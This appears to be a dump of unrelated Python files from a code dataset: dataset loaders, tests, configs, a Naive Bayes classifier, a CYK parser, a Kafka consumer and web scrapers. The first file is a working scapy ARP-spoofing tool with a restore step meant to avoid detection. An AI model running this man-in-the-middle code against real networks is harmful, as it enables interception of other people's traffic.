text
stringlengths 8
6.05M
|
|---|
from scapy.layers.l2 import Ether, ARP, srp
from scapy.all import send
import os
import sys
def get_mac(ip):
"""
Gets the MAC address of the IP address.
:param ip: IP address to get the MAC of.
:return: MAC address of IP OR None
"""
# Send the ARP request packet asking for the owner of the IP address
# If IP is down ie. unused returns None
ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
def _enable_ip_routing_windows():
"""
Enables IP forwarding (routing) on Windows systems.
"""
from services import WService
service = WService("Remote Access")
service.start()
def _enable_ip_routing_linux():
"""
Enables IP forwarding (routing) on Linux systems. I'd just like to interject for a moment...
"""
try:
file_path = "/proc/sys/net/ipv4/ip_forward" # File for IP forwarding on Linux based distros
with open(file_path) as file:
# Have no idea why "1" == "1" returns False but "1" > "1" returns True TODO: FIGURE IT OUT!!
if file.read() > "1": # IP forwarding is already enabled. No need fo further action.
return
with open(file_path, mode="w") as file: # open the file in "w"rite mode
print(1, file=file)
except PermissionError:
sys.exit("Access denied. Are you root? Try running spoofdogg with \"sudo\"")
def enable_ip_routing():
"""
Enables IP routing for the particular OS.
"""
print("[*] Enabling IP routing...")
if "nt" in os.name:
_enable_ip_routing_windows()
else:
_enable_ip_routing_linux()
print("[*] IP routing enabled.")
def spoof(target, host):
"""
Spoofs target IP by saying the attacker is the host IP
:param target: Target of this spoof. Who are we reaching?
:param host: IP the attacker is spoofing. Who are we?
"""
target_mac = get_mac(target)
# Craft the ARP response saying the attacker is the host.
# No hwsrc specified because by default that's the attacker's MAC address
arp_response = ARP(pdst=target, hwdst=target_mac, psrc=host, op="is-at")
# Send the packet. Verbose=0 means we are sending without printing anything.
send(arp_response, verbose=0)
self_mac = ARP().hwsrc
print("[->] Sent to {} : {} is-at {}".format(target, host, self_mac))
def restore(target, host):
"""
Restores the normal process of a normal network by sending seven regular ARP packets.
This is achieved by sending the original IP address and MAC of the gateway to the target.
In the end everything looks as if nothing weird happened.
If this is not called, the victim loses internet connection and that would be suspicious.
TL:DR -> Everything back to normal, no flags raised.
:param target: Target the attacker is trying to reach.
:param host: The destination attacker is trying to reach
"""
# Original information
target_mac = get_mac(target)
host_mac = get_mac(host)
# Innocent ARP response
arp_response = ARP(pdst=target, hwdst=target_mac, psrc=host, hwsrc=host_mac)
# Send the innocent ARP packet to restore the network to its original condition.
# Sent seven times for good measure
send(arp_response, verbose=0, count=7)
print("[->] Network restored")
print("[->] Sent to {} : {} is-at {}".format(target, host, host_mac))
|
def cockroach_speed(km_h):
return int(km_h / 0.036) # centimeters per second
|
from os.path import join
from typing import Any, Callable, List, Optional, Tuple
from PIL import Image
from .utils import check_integrity, download_and_extract_archive, list_dir, list_files
from .vision import VisionDataset
class Omniglot(VisionDataset):
"""`Omniglot <https://github.com/brendenlake/omniglot>`_ Dataset.
Args:
root (string): Root directory of dataset where directory
``omniglot-py`` exists.
background (bool, optional): If True, creates dataset from the "background" set, otherwise
creates from the "evaluation" set. This terminology is defined by the authors.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
download (bool, optional): If true, downloads the dataset zip files from the internet and
puts it in root directory. If the zip files are already downloaded, they are not
downloaded again.
"""
folder = "omniglot-py"
download_url_prefix = "https://raw.githubusercontent.com/brendenlake/omniglot/master/python"
zips_md5 = {
"images_background": "68d2efa1b9178cc56df9314c21c6e718",
"images_evaluation": "6b91aef0f799c5bb55b94e3f2daec811",
}
def __init__(
self,
root: str,
background: bool = True,
transform: Optional[Callable] = None,
target_transform: Optional[Callable] = None,
download: bool = False,
) -> None:
super().__init__(join(root, self.folder), transform=transform, target_transform=target_transform)
self.background = background
if download:
self.download()
if not self._check_integrity():
raise RuntimeError("Dataset not found or corrupted. You can use download=True to download it")
self.target_folder = join(self.root, self._get_target_folder())
self._alphabets = list_dir(self.target_folder)
self._characters: List[str] = sum(
([join(a, c) for c in list_dir(join(self.target_folder, a))] for a in self._alphabets), []
)
self._character_images = [
[(image, idx) for image in list_files(join(self.target_folder, character), ".png")]
for idx, character in enumerate(self._characters)
]
self._flat_character_images: List[Tuple[str, int]] = sum(self._character_images, [])
def __len__(self) -> int:
return len(self._flat_character_images)
def __getitem__(self, index: int) -> Tuple[Any, Any]:
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target character class.
"""
image_name, character_class = self._flat_character_images[index]
image_path = join(self.target_folder, self._characters[character_class], image_name)
image = Image.open(image_path, mode="r").convert("L")
if self.transform:
image = self.transform(image)
if self.target_transform:
character_class = self.target_transform(character_class)
return image, character_class
def _check_integrity(self) -> bool:
zip_filename = self._get_target_folder()
if not check_integrity(join(self.root, zip_filename + ".zip"), self.zips_md5[zip_filename]):
return False
return True
def download(self) -> None:
if self._check_integrity():
print("Files already downloaded and verified")
return
filename = self._get_target_folder()
zip_filename = filename + ".zip"
url = self.download_url_prefix + "/" + zip_filename
download_and_extract_archive(url, self.root, filename=zip_filename, md5=self.zips_md5[filename])
def _get_target_folder(self) -> str:
return "images_background" if self.background else "images_evaluation"
|
import collections
import json
import os.path
import pelops.datasets.chip as chip
import pelops.utils as utils
class DGCarsDataset(chip.ChipDataset):
filenames = collections.namedtuple(
"filenames",
[
"all_list",
"train_list",
"test_list",
]
)
filepaths = filenames(
"allFiles",
"training",
"testing",
)
def __init__(self, dataset_path, set_type=None):
super().__init__(dataset_path, set_type)
self.__set_filepaths() # set self.__filepaths
self.__set_chips()
def __set_filepaths(self):
self.__filepaths = self.filenames(
os.path.join(self.dataset_path, DGCarsDataset.filepaths.all_list),
os.path.join(self.dataset_path, DGCarsDataset.filepaths.train_list),
os.path.join(self.dataset_path, DGCarsDataset.filepaths.test_list),
)
def __set_chips(self):
# identify all the chips, default query to all
name_filepath = {
utils.SetType.ALL: self.__filepaths.all_list,
utils.SetType.TEST: self.__filepaths.test_list,
utils.SetType.TRAIN: self.__filepaths.train_list,
}.get(self.set_type, self.__filepaths.all_list)
# create chip objects based on the names listed in the files
for dg_chip in utils.read_json(name_filepath):
filepath = os.path.normpath(os.path.join(self.dataset_path, dg_chip["filename"]))
car_id = None
cam_id = None
time = None
misc = dg_chip
current_chip = chip.Chip(filepath, car_id, cam_id, time, misc)
self.chips[filepath] = current_chip
|
# coding:utf-8
# with语句
# 需求1:文件处理,用户需要获取一个文件句柄,从文件中读取数据,然后关闭数据
with open("text.txt") as f:
data = f.read()
# 使用了with语句,不需要try-finally语句来确保文件对象的关闭。因为无论程序是否出现异常,文件对象都将被系统关闭。
|
class PluginInfo:
def __init__(self) -> None: ...
def __bool__(self) -> bool: ...
@property
def items(self): ...
def __contains__(self, name) -> bool: ...
def __getitem__(self, name): ...
# Names in __all__ with no definition:
# _dispatch
# _mark_tests
|
import keg_storage
class DefaultProfile(object):
# This just gets rid of warnings on the console.
KEG_KEYRING_ENABLE = False
SITE_NAME = 'Keg Storage Demo'
SITE_ABBR = 'KS Demo'
KEG_STORAGE_PROFILES = [
(keg_storage.S3Storage, {
'name': 'storage.s3',
'bucket': 'storage.test',
'aws_region': 'us-east-1',
'aws_access_key_id': 'access-key-id',
'aws_secret_access_key': 'secret-key',
}),
(keg_storage.SFTPStorage, {
'name': 'storage.sftp',
'host': 'example.com',
'username': 'john.doe',
'key_filename': '/key/path',
'known_hosts_fpath': '/known/hosts/path',
'allow_agent': False,
'look_for_keys': False,
})
]
# KEG_STORAGE_DEFAULT_LOCATION = 'storage.s3'
class TestProfile(object):
pass
|
#Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/TauDataFormat/TauNtuple/',1)[0])+'/cfipython/slc5_amd64_gcc462/TauDataFormat/TauNtuple')
|
import unittest
import numpy.testing as testing
import numpy as np
import hpgeom as hpg
from numpy import random
import tempfile
import shutil
import os
import pytest
import healsparse
try:
import healpy as hp
has_healpy = True
except ImportError:
has_healpy = False
class HealpixIoTestCase(unittest.TestCase):
@pytest.mark.skipif(not has_healpy, reason="Requires healpy")
def test_healpix_implicit_read(self):
"""Test reading healpix full (implicit) maps."""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
n_rand = 1000
ra = np.random.random(n_rand) * 360.0
dec = np.random.random(n_rand) * 180.0 - 90.0
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
# Generate a random map
full_map = np.zeros(hpg.nside_to_npixel(nside_map)) + hpg.UNSEEN
full_map[0: 20000] = np.random.random(size=20000)
ipnest = hpg.angle_to_pixel(nside_map, ra, dec)
test_values = full_map[ipnest]
filename = os.path.join(self.test_dir, 'healpix_map_ring.fits')
full_map_ring = hp.reorder(full_map, n2r=True)
hp.write_map(filename, full_map_ring, dtype=np.float64)
# Read it with healsparse
sparse_map = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
# Check that we can do a basic lookup
testing.assert_almost_equal(sparse_map.get_values_pix(ipnest), test_values)
# Save map to healpy in nest
filename = os.path.join(self.test_dir, 'healpix_map_nest.fits')
hp.write_map(filename, full_map, dtype=np.float64, nest=True)
# Read it with healsparse
sparse_map = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
# Check that we can do a basic lookup
testing.assert_almost_equal(sparse_map.get_values_pix(ipnest), test_values)
# Test that we get an exception if reading without nside_coverage
with self.assertRaises(RuntimeError):
sparse_map = healsparse.HealSparseMap.read(filename)
@pytest.mark.skipif(not has_healpy, reason="Requires healpy")
def test_healpix_explicit_read(self):
"""Test reading healpix partial (explicit) maps."""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
n_rand = 1000
ra = np.random.random(n_rand) * 360.0
dec = np.random.random(n_rand) * 180.0 - 90.0
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
# Generate a random map
full_map = np.zeros(hpg.nside_to_npixel(nside_map)) + hpg.UNSEEN
full_map[0: 20000] = np.random.random(size=20000)
ipnest = hpg.angle_to_pixel(nside_map, ra, dec)
test_values = full_map[ipnest]
filename = os.path.join(self.test_dir, 'healpix_map_ring_explicit.fits')
full_map_ring = hp.reorder(full_map, n2r=True)
hp.write_map(filename, full_map_ring, dtype=np.float64, partial=True)
# Read it with healsparse
sparse_map = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
# Check that we can do a basic lookup
testing.assert_almost_equal(sparse_map.get_values_pix(ipnest), test_values)
filename = os.path.join(self.test_dir, 'healpix_map_nest_explicit.fits')
hp.write_map(filename, full_map, dtype=np.float64, nest=True, partial=True)
# Read it with healsparse
sparse_map = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
# Check that we can do a basic lookup
testing.assert_almost_equal(sparse_map.get_values_pix(ipnest), test_values)
@pytest.mark.skipif(not has_healpy, reason="Requires healpy")
def test_healpix_explicit_write(self):
"""Test writing healpix partial (explicit) maps (floating point)."""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
n_rand = 1000
ra = np.random.random(n_rand) * 360.0
dec = np.random.random(n_rand) * 180.0 - 90.0
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
# Generate a random map
full_map = np.zeros(hpg.nside_to_npixel(nside_map)) + hpg.UNSEEN
full_map[0: 20000] = np.random.random(size=20000)
ipnest = hpg.angle_to_pixel(nside_map, ra, dec)
test_values = full_map[ipnest]
filename = os.path.join(self.test_dir, 'healsparse_healpix_partial_map.fits')
sparse_map = healsparse.HealSparseMap(healpix_map=full_map, nside_coverage=nside_coverage, nest=True)
sparse_map.write(filename, format='healpix')
# Read in with healsparse and make sure it is the same.
sparse_map2 = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
np.testing.assert_array_equal(sparse_map2.valid_pixels, sparse_map.valid_pixels)
testing.assert_array_almost_equal(sparse_map2.get_values_pix(ipnest), test_values)
# Read in with healpy and make sure it is the same.
full_map2 = hp.read_map(filename, nest=True)
testing.assert_array_equal((full_map2 > hpg.UNSEEN).nonzero()[0], sparse_map.valid_pixels)
testing.assert_array_almost_equal(full_map2[ipnest], test_values)
@pytest.mark.skipif(not has_healpy, reason="Requires healpy")
def test_healpix_explicit_int_write(self):
"""Test writing healpix partial (explicit) maps (integer)."""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
n_rand = 1000
ra = np.random.random(n_rand) * 360.0
dec = np.random.random(n_rand) * 180.0 - 90.0
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
# Generate a map
full_map = np.zeros(hpg.nside_to_npixel(nside_map), dtype=np.int32)
full_map[0: 10000] = 4
full_map[20000: 30000] = 5
ipnest = hpg.angle_to_pixel(nside_map, ra, dec)
test_values = full_map[ipnest]
filename = os.path.join(self.test_dir, 'healsparse_healpix_int_partial_map.fits')
sparse_map = healsparse.HealSparseMap(
healpix_map=full_map,
nside_coverage=nside_coverage,
nest=True,
sentinel=0
)
with self.assertWarns(UserWarning):
sparse_map.write(filename, format='healpix')
# Read in with healsparse and make sure it is the same.
sparse_map2 = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
np.testing.assert_array_equal(sparse_map2.valid_pixels, sparse_map.valid_pixels)
testing.assert_almost_equal(sparse_map2.get_values_pix(ipnest), test_values)
# Read in with healpy and make sure it is the same.
full_map2 = hp.read_map(filename, nest=True)
testing.assert_array_equal((full_map2 > hpg.UNSEEN).nonzero()[0], sparse_map.valid_pixels)
# healpy will convert all the BAD_DATA to UNSEEN
good, = (test_values > 0).nonzero()
bad, = (test_values == 0).nonzero()
testing.assert_array_equal(full_map2[ipnest[good]], test_values[good])
testing.assert_array_almost_equal(full_map2[ipnest[bad]], hpg.UNSEEN)
def test_healpix_recarray_write(self):
"""Test that the proper error is raised if you try to persist via healpix format."""
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
nside_coverage = 32
nside_map = 64
filename = os.path.join(self.test_dir, 'test_file.fits')
dtype = [('a', 'f4'), ('b', 'i2')]
sparse_map = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype, primary='a')
with self.assertRaises(NotImplementedError):
sparse_map.write(filename, format='healpix')
def setUp(self):
self.test_dir = None
def tearDown(self):
if self.test_dir is not None:
if os.path.exists(self.test_dir):
shutil.rmtree(self.test_dir, True)
if __name__ == '__main__':
unittest.main()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import os
def get_args():
parser = argparse.ArgumentParser(description='BERT Baseline')
parser.add_argument("--model_name",
default="BertOrigin",
type=str,
help="the name of model")
parser.add_argument("--model_type",
default='bert',
type=str,
help="PTM 基础模型: bert,albert,roberta,xlnet")
# 文件路径:数据目录, 缓存目录
parser.add_argument("--data_dir",
default='/ssd2/songyingxin/songyingxin/dataset/QQP',
type=str,
help="The input data dir. Should contain the .tsv files (or other data files) for the task.")
parser.add_argument("--output_dir",
default="BertOrigin",
type=str,
help="The output directory where the model predictions and checkpoints will be written.")
# parser.add_argument("--cache_dir",
# default='cache',
# type=str,
# help="缓存目录,主要用于模型缓存")
parser.add_argument("--log_dir",
default='log' + os.sep + 'BertOrigin',
type=str,
help="日志目录,主要用于 tensorboard 分析")
# PTM 相关文件参数
parser.add_argument("--config_file",
default='/ssd2/songyingxin/PreTrainedModels/bert-uncased-base/bert_config.json',
type=str)
parser.add_argument("--vocab_file",
default='/ssd2/songyingxin/PreTrainedModels/bert-uncased-base/bert-base-uncased-vocab.txt',
type=str)
parser.add_argument("--model_file",
default='/ssd2/songyingxin/PreTrainedModels/bert-uncased-base/pytorch_model.bin',
type=str)
# 文本预处理参数
parser.add_argument("--do_lower_case",
default=True,
type=bool,
help="Set this flag if you are using an uncased model.")
parser.add_argument("--max_length",
default=50,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--do_train",
action='store_true',
help="Whether to run training.")
# 训练参数
parser.add_argument("--train_batch_size",
default=64,
type=int,
help="Total batch size for training.")
parser.add_argument("--dev_batch_size",
default=8,
type=int,
help="Total batch size for dev.")
parser.add_argument("--test_batch_size",
default=32,
type=int,
help="Total batch size for test.")
parser.add_argument("--num_train_epochs",
default=3,
type=int,
help="训练的 epoch 数目")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="Adam 的 学习率")
parser.add_argument("--weight_decay", default=0.0,
type=float, help="Weight decay if we apply some.")
parser.add_argument("--adam_epsilon", default=1e-8,
type=float, help="Epsilon for Adam optimizer.")
parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.")
parser.add_argument("--warmup_steps", default=0, type=int,
help="Linear warmup over warmup_steps.")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=1,
help="梯度累积")
parser.add_argument('--save_step',
type=int,
default=1000,
help="多少步进行模型保存以及日志信息写入")
parser.add_argument("--gpu_ids",
type=str,
default="0",
help="gpu 的设备id")
parser.add_argument('--seed',
type=int,
default=42,
help="随机种子 for initialization")
config = parser.parse_args()
return config
if __name__ == "__main__":
get_args()
|
#encoding: utf8
import string
import math
import scripts
class NaiveBayesClassifier:
def __init__(self, alpha = 1):
self.alpha = alpha
return
def fit(self, X, y):
""" Fit Naive Bayes classifier according to X, y. """
targets = list(set(y)) # список состояний
words = dict() # список слов
all_targets = dict() # количество слов в этом состоянии
self.targets = targets
self.words = words
self.all_targets = all_targets
for _target in targets:
all_targets[_target] = 0
for (msg, target) in zip(X, y):
for word in scripts.morph_analyzer(msg):
if word not in words: # если видим это слово впервые
words[word] = dict()
for _target in targets:
words[word][_target] = 0 # для каждого состояния количество повторов этого слова = 0
words[word][target] += 1
all_targets[target] += 1
chances = dict() # вероятность встретить слово в этом состоянии
for word in words:
chances[word] = dict()
for target in targets:
chances[word][target] = (words[word][target] + self.alpha) / (all_targets[target] + self.alpha * len(words))
self.chances = chances
'''line = [(words[word]['never'], word) for word in words]
line.sort(reverse=True)
print(*line, sep='\n')'''
def predict(self, X):
""" Perform classification on an array of test vectors X. """
pre = list()
for msg in X:
final_state = None
final_state_target = ''
for target in self.targets:
state = math.log(self.all_targets[target])
for word in scripts.morph_analyzer(msg):
if word in self.words:
state += math.log(self.chances[word][target])
if final_state == None:
final_state = state
final_state_target = target
elif state > final_state:
final_state = state
final_state_target = target
pre.append(final_state_target)
return pre
def score(self, X_test, y_test):
""" Returns the mean accuracy on the given test data and labels. """
line = self.predict(X_test)
cnt = 0
for i in range(len(y_test)):
cnt += int(y_test[i] == line[i])
return cnt / len(y_test)
def test():
import scripts
import csv
with open('SMSSpamCollection.csv') as f:
data = list(csv.reader(f, delimiter='\t'))
nbc = NaiveBayesClassifier(0.05)
X = [scripts.clean(elem[1]) for elem in data]
y = [elem[0] for elem in data]
X_train, y_train, X_test, y_test = X[:3900], y[:3900], X[3900:], y[3900:]
nbc.fit(X_train, y_train)
print(nbc.score(X_test, y_test))
|
import copy
class Language(object):
class Rule(object):
def __init__(self, string=None):
if string is not None:
self.__init_from_string(string)
def __init_from_string(self, string):
parts = string.split(' ')
self._from = parts[0]
self._to = []
for i in parts[1:]:
self._to.append(i)
def is_lamda_rule(self):
return len(self._to) == 0
def get_left_side(self):
return self._from[:]
def get_right_side(self):
return self._to[:]
def get_all_symbols(self):
return set([self._from]).union(set(self._to))
def get_splitted_copy(self, terminals_to_replace):
new_rule = copy.deepcopy(self)
for i in range(0, len(new_rule._to)):
if new_rule._to[i] in terminals_to_replace:
new_rule._to[i] = new_rule._to[i] + '\''
return new_rule
def _get_right_part_str(self):
if self.is_lamda_rule():
return chr(955)
else:
return ' '.join(self._to)
def __str__(self):
return '%s -> %s' % (self._from, self._get_right_part_str())
def __repr__(self):
return '%s -> %s' % (self._from, self._get_right_part_str())
def __init_from_file(self, filename):
with open(filename, 'r') as f:
nonterminals_num = int(f.readline())
self._nonterminals = []
for _ in range(0, nonterminals_num):
self._nonterminals.append(f.readline().strip(' \n\t'))
terminals_num = int(f.readline().strip(' \n\t'))
self._terminals = []
for _ in range(0, terminals_num):
self._terminals.append(f.readline().strip(' \n\t'))
rules_num = int(f.readline())
self._rules = []
for _ in range(0, rules_num):
rule = Language.Rule(string=f.readline().strip(' \n\t'))
self._rules.append(rule)
self._start_symbol = f.readline().strip(' \n\t')
def __init_from_data(self, terminals, non_terminals, rules, start):
self._nonterminals = non_terminals[:]
self._terminals = terminals[:]
self._start_symbol = start
self._rules = copy.deepcopy(rules)
def __init__(self, filename=None, terminals=None, non_terminals=None, rules=None, start=None):
if filename is not None:
self.__init_from_file(filename)
elif terminals is not None:
self.__init_from_data(terminals, non_terminals, rules, start)
def split_grammer(self, nonterminals_to_replace):
new_grammers = []
new_rules = []
for rule in self._rules:
new_rules.append(rule.get_splitted_copy(nonterminals_to_replace))
for nonterminal_to_replace in nonterminals_to_replace:
new_nonterminals = list((set(self._nonterminals)-set(nonterminals_to_replace)).union(set([nonterminal_to_replace])))
new_terminals = list(set(self._terminals).union(set([i + '\'' for i in nonterminals_to_replace])))
new_grammers.append(Language(terminals=new_terminals, non_terminals=new_nonterminals, rules=new_rules, start=nonterminal_to_replace))
return new_grammers
def get_Ne(self):
previous_set = set([])
while 1:
current_set = set([])
for rule in self._rules:
if set(rule.get_right_side()).issubset(previous_set.union(set(self._terminals))):
current_set.add(rule.get_left_side())
if current_set == previous_set:
break
previous_set = current_set
return list(previous_set)
def remove_unnecessary_nonterminals(self):
ne = self.get_Ne()
new_nonterminals = list(filter(lambda x: x in ne, self._nonterminals))
new_rules = list(filter(lambda x: x.get_all_symbols().issubset(set(self._terminals).union(set(ne))), self._rules))
self._nonterminals = new_nonterminals
self._rules = new_rules
def remove_unreachable_symbols(self):
previous_set = set([self._start_symbol])
while 1:
current_set = copy.deepcopy(previous_set)
for rule in self._rules:
if rule.get_left_side() in previous_set:
for i in rule.get_right_side():
current_set.add(i)
if current_set == previous_set:
break
previous_set = current_set
self._nonterminals = list(set(self._nonterminals).intersection(previous_set))
self._terminals = list(set(self._terminals).intersection(previous_set))
self._rules = list(filter(lambda x: x.get_all_symbols().issubset(previous_set), self._rules))
def delete_long_rules(self):
extra_nonterm_num = 0
new_rules = []
new_nonterminals = []
for rule in self._rules:
if len(rule.get_right_side()) <= 2:
new_rules.append(rule)
continue
new_rules.append(Language.Rule("%s %s %s" % (rule.get_left_side(), rule.get_right_side()[0], "EXTRA_NONTERMINAL_%s" % extra_nonterm_num)))
self._nonterminals.append("EXTRA_NONTERMINAL_%s" % extra_nonterm_num)
extra_nonterm_num = extra_nonterm_num + 1
for i in range(1, len(rule.get_right_side()) - 2):
new_rules.append(Language.Rule("%s %s %s" % ("EXTRA_NONTERMINAL_%s" % extra_nonterm_num - 1, rule.get_right_side()[i], "EXTRA_NONTERMINAL_%s" % extra_nonterm_num)))
self._nonterminals.append("EXTRA_NONTERMINAL_%s" % extra_nonterm_num)
extra_nonterm_num = extra_nonterm_num + 1
new_rules.append(Language.Rule("%s %s %s" % ("EXTRA_NONTERMINAL_%s" % (extra_nonterm_num - 1, ), rule.get_right_side()[len(rule.get_right_side()) - 2], rule.get_right_side()[len(rule.get_right_side()) - 1])))
self._rules = new_rules
def delete_chain_rules(self):
chain_pairs = [(A, A) for A in self._nonterminals]
found_new = True
while found_new:
found_new = False
new_chain_pairs = []
for chain_pair in chain_pairs:
for rule in self._rules:
if (len(rule.get_right_side()) != 1) or (rule.get_right_side()[0] not in self._nonterminals):
continue
if (chain_pair[1] == rule.get_left_side()) and ((chain_pair[0], rule.get_right_side()[0]) not in chain_pairs):
new_chain_pairs.append((chain_pair[0], rule.get_right_side()[0]))
found_new = True
chain_pairs.extend(new_chain_pairs)
new_rules = []
for chain_pain in chain_pairs:
for rule in self._rules:
if ((len(rule.get_right_side()) == 1) and (rule.get_right_side()[0] in self._nonterminals)) or (chain_pain[1] != rule.get_left_side()):
continue
new_rules.append(Language.Rule("%s %s" % (chain_pain[0], ' '.join(rule.get_right_side()))))
for rule in self._rules:
if (len(rule.get_right_side()) != 1) or (rule.get_right_side()[0] not in self._nonterminals):
new_rules.append(rule)
self._rules = new_rules
def remake_double_terms(self):
new_rules = []
placeholder = 0
for rule in self._rules:
if (len(rule.get_right_side()) != 2):
new_rules.append(rule)
continue
rule_str = rule.get_left_side() + ' '
if rule.get_right_side()[0] in self._terminals:
rule_str = rule_str + ("PLACEHOLDER_%s" % placeholder) + ' '
new_rules.append(Language.Rule("%s %s" % ("PLACEHOLDER_%s" % placeholder, rule.get_right_side()[0])))
self._nonterminals.append("PLACEHOLDER_%s" % placeholder)
placeholder = placeholder + 1
else:
rule_str = rule_str + rule.get_right_side()[0] + ' '
if rule.get_right_side()[1] in self._terminals:
rule_str = rule_str + ("PLACEHOLDER_%s" % placeholder)
new_rules.append(Language.Rule("%s %s" % ("PLACEHOLDER_%s" % placeholder, rule.get_right_side()[1])))
self._nonterminals.append("PLACEHOLDER_%s" % placeholder)
placeholder = placeholder + 1
else:
rule_str = rule_str + rule.get_right_side()[1]
new_rules.append(Language.Rule(rule_str))
self._rules = new_rules
def __repr__(self):
return self.__str__()
def __str__(self):
return "Non-terminals: %s\nTerminals: %s\nRules: %s\nStart symbol: %s" % (self._nonterminals, self._terminals, self._rules, self._start_symbol)
def build_parse_table(self, terminal_chain):
terminal_chain = terminal_chain.split(' ')
parse_table = [[set() for _ in range(0, len(terminal_chain) - i)] for i in range(0, len(terminal_chain))]
for i in range(0, len(terminal_chain)):
for rule in self._rules:
if terminal_chain[i] in rule.get_right_side():
parse_table[i][0].add(rule.get_left_side())
print(parse_table)
for j in range(2, len(terminal_chain) + 1):
for i in range(1, len(terminal_chain) - j + 2):
for k in range(1, j):
for rule in self._rules:
if len(rule.get_right_side()) != 2:
continue
B = rule.get_right_side()[0]
C = rule.get_right_side()[1]
if (B in parse_table[i - 1][k - 1]) and (C in parse_table[i + k - 1][j - k - 1]):
parse_table[i - 1][j - 1].add(rule.get_left_side())
return parse_table
def left_parsing(self, terminal_chain, parse_table):
terminal_chain = terminal_chain.split(' ')
def gen(i, j, A):
if j == 1:
for rule in self._rules:
if (rule.get_right_side()[0] == terminal_chain[i - 1]) and (rule.get_left_side() == A):
print(rule)
return
for k in range(1, j):
for rule in self._rules:
if len(rule.get_right_side()) != 2:
continue
if rule.get_left_side() != A:
continue
B = rule.get_right_side()[0]
C = rule.get_right_side()[1]
if (B in parse_table[i - 1][k - 1]) and (C in parse_table[i + k - 1][j - k - 1]):
print(rule)
gen(i, k, B)
gen(i + k, j - k, C)
return
if self._start_symbol not in parse_table[0][len(parse_table) - 1]:
print('Impossible terminal chain')
gen(1, len(terminal_chain), self._start_symbol)
language = Language(filename='grammer728.txt')
print('Original grammer:')
print(language)
print('')
print('')
print('Delete long rules:')
language.delete_long_rules()
print(language)
print('')
print('')
print('Delete chain rules:')
language.delete_chain_rules()
print(language)
print('')
print('')
print('Delete extra symbols:')
language.remove_unnecessary_nonterminals()
language.remove_unreachable_symbols()
print(language)
print('')
print('')
print('Normal Homskey form:')
language.remake_double_terms()
print(language)
terminal_chain = 'not ( ( ( a + b ) * ( - a ) / ( pi * pi ) ) div ( b * b ) )'
parse_table = language.build_parse_table(terminal_chain)
print('')
print('')
print('Parsing table')
for i in range(0, len(terminal_chain.split(' '))):
for j in range(0, len(terminal_chain.split(' ')) - i):
print(i + 1, j + 1)
print(parse_table[i][j], )
print()
print('')
print('')
print('Production')
language.left_parsing(terminal_chain, parse_table)
|
from kafka import KafkaConsumer
import json
import io
topic = 'electric'
key_deserializer = 'org.apache.kafka.connect.storage.StringConverter'
value_deserializer = lambda m: json.loads(m.decode('ascii'))
group_id = 'electric-group'
consumer = KafkaConsumer(topic, group_id='consumer-grp', value_deserializer=value_deserializer)
print("Consumer connected : ", consumer.bootstrap_connected())
i = 0
for msg in consumer:
print(i, " Message is : ",msg)
i = i+1
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 3 15:28:16 2019
@author: dhk13
"""
from bs4 import BeautifulSoup as soup
import requests
import datetime
def SWedu(today1):
url="http://swedu.khu.ac.kr/board5/bbs/board.php?bo_table=06_01"
html=requests.get(url).text
obj=soup(html, "html.parser")
table=obj.find("div", {"class":"colgroup"}).find("div",{"id":"bo_list"}).find("form",{"id":"fboardlist"}).find("tbody").findAll("tr")
newsbox=[]
for i in table:
date=i.find("td",{"class":"td_datetime"}).text.strip()
if(date==today1):
title=i.find("td", {"class":"td_subject"})
title=title.find("div",{"class":"bo_tit"})
title=title.find("a").text.strip() #제목
newsbox.append(title)
if(len(newsbox)==0):
newsbox.append("No New Issue on SW중심사업단\n")
temp_response={
"version": "2.0",
"template": {
"outputs": [
{
"simpleText": {
"text": "간단한 텍스트 요소입니다."
}
}
]
}
}
#return newsbox
return temp_response
def KIC(today2):
url="http://kic.khu.ac.kr/notice/undergraduate/"
html=requests.get(url).text
obj=soup(html, "html.parser")
table=obj.find("body").find("article").find("div", {"class":"kboard-list"}).findAll("tr")
table=table[1:]
newsbox=[]
for row in table:
date=row.find("td",{"class":"kboard-list-date"}).text.strip()
if(date==today2):
title=row.find("td",{"class":"kboard-list-title"}).find("a").find("div",{"class":"kboard-default-cut-strings"}).text.strip()
newsbox.append(title)
if(len(newsbox)==0):
newsbox.append("No NEW Issue on KIC\n")
return newsbox
def SoftwareKHU(today1):
url="http://software.khu.ac.kr/board5/bbs/board.php?bo_table=05_01"
html=requests.get(url).text
obj=soup(html, "html.parser")
table=obj.find("div",{"class":"sContainer"}).find("tbody").findAll("tr")
newsbox=[]
for row in table:
date=row.find("td",{"class":"td_datetime"}).text.strip()
if(date==today1):
title=row.find("div",{"class":"bo_tit"}).text.strip()
newsbox.append(title)
if(len(newsbox)==0):
newsbox.append("No New Issue on SW융합대학\n")
